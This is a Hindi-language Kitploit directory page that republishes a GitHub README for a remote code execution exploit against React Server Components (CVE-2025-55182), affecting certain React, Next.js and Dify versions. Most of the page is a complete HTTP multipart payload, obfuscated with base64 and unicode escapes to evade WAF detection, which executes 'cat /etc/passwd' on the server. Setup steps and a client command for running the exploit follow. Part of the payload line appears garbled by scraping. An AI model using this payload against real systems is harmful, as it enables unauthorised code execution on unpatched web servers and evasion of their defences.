Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-React-RCE — [भेद्यता पुनरुत्पादन] दुनिया का पहला CVE-2025-55182 React Server RCE भेद्यता EXP जो RSC विशेषता पर आधारित है और WAF पहचान को बायपास कर सकता है। | Kitploit
उपकरण/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[भेद्यता पुनरुत्पादन] दुनिया का पहला CVE-2025-55182 React Server RCE भेद्यता EXP जो RSC विशेषता पर आधारित है और WAF पहचान को बायपास कर सकता है।

रिपॉजिटरी देखें
15129 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182-React-RCE

परियोजना परिचय और सिद्धांत

  • RSC सुविधाओं पर आधारित दुनिया का पहला CVE-2025-55182 React Server RCE एक्सप्लॉइट जो WAF डिटेक्शन को बायपास कर सकता है।
  • The world’s first CVE‑2025‑55182 React Server RCE exploit that can bypass WAF detection by leveraging RSC-specific features.
  • React Server डिफ़ॉल्ट वातावरण में RCE प्राप्त करें।
  • नया मूल EXP, WAF बायपास परिदृश्यों के लिए समर्थन। सिद्धांत: getOutlinedModel में क्रॉस-ब्लॉक + स्तरीय JSON संदर्भ संभव है।
  • अत्यधिक संक्षिप्त पुनरुत्पादन वातावरण प्रदान करता है।

EXP के लाभ

  • __proto__:then या constructor:constructor की आवश्यकता के बिना RCE।
  • WAF द्वारा अक्सर ब्लॉक किए जाने वाले कीवर्ड जैसे "then": $1:__proto__:then, "get": $1:constructor:constructor, require('child_process') दिखाई नहीं देंगे।
  • एक EXP डिफ़ॉल्ट कॉन्फ़िगरेशन के साथ मूल React Server, Next.js, और Dify वातावरण के साथ संगत है।

पुनरुत्पादन वातावरण के लाभ

  • अत्यधिक संक्षिप्त।
  • त्वरित सेटअप।

भेद्यता सारांश

जानकारीविवरण
भेद्यता नामReact Server RCE
भेद्यता आईडीCVE-2025-55182
जोखिम स्तरउच्च
भेद्यता प्रकारRCE
शोषण कठिनाईनिम्न

प्रभावित संस्करण

  • React प्रभावित संस्करण == 19.0.0
  • React प्रभावित संस्करण == 19.0.1
  • React प्रभावित संस्करण == 19.1.0
  • React प्रभावित संस्करण == 19.2.0
  • react-server-dom-webpack पैकेज प्रभावित संस्करण == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel पैकेज प्रभावित संस्करण == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack पैकेज प्रभावित संस्करण == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • Next.js प्रभावित संस्करण >= 14.3.0-canary.77
  • Next.js 15.0.0 <= प्रभावित संस्करण < 15.0.5
  • Next.js 15.1.0 <= प्रभावित संस्करण < 15.1.9
  • Next.js 15.2.0 <= प्रभावित संस्करण < 15.2.6
  • Next.js 15.3.0 <= प्रभावित संस्करण < 15.3.6
  • Next.js 15.4.0 <= प्रभावित संस्करण < 15.4.8
  • Next.js 15.5.0 <= प्रभावित संस्करण < 15.5.7
  • Next.js 16.0.0 <= प्रभावित संस्करण < 16.0.7
  • Dify 1.1.2 <= प्रभावित संस्करण < 1.10.1-fix.1

EXP 1

WAF बायपास परिदृश्यों + डिफ़ॉल्ट परिदृश्य के लिए उपयोग किया जा सकता है:

POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Length: 1445

------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="1"

{
    "\u0074\u0068\u0065\u006e": "$2:et",
    "status": "$2:es",
    "reason": "",
    "value": "$2:ev",
    "_response": "$2:er"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="2"

{
    "et": "$3",
    "es": "$4",
    "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
    "er": {
        "_prefix": "$2:ep",
        "_formData": "$2:ef"
    },
    "ep": "$5",
    "ef": {
        "get": "$2:eg"
    },
    "eg": "$6"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="3"

"$0:\u0074\u0068\u0065\u006e"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="4"

"\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="5"

"x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="6"

"$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad--

पुनरुत्पादन 1

  1. सर्वर वातावरण:
react-server-dom-webpack 19.2.0
  1. सर्वर डाउनलोड करें और react-server-dom-webpack के लिए आवश्यक निर्भरताएँ स्थापित करें:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npm install
npm run dev -- --hostname 127.0.0.1 --port 3000

सेवा सफलतापूर्वक सेटअप: http://127.0.0.1:3000/

  1. क्लाइंट EXP का उपयोग करें
python3 -m venv .venv
. ./.venv/bin/activate
pip3 install requests
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"

पुनरुत्पादन 2

  1. सर्वर वातावरण:
Next.js 16.0.6

वास्तव में react-server-dom-webpack 19.2.0 के अनुरूप भी है।

  1. सर्वर डाउनलोड करें और Next.js के लिए आवश्यक निर्भरताएँ स्थापित करें:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
cd nextapp
npm run dev -- --hostname 127.0.0.1 --port 3000

सेवा सफलतापूर्वक सेटअप: http://127.0.0.1:3000/

  1. क्लाइंट EXP का उपयोग करें (ऊपर के समान)
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
टूल डाउनलोड करें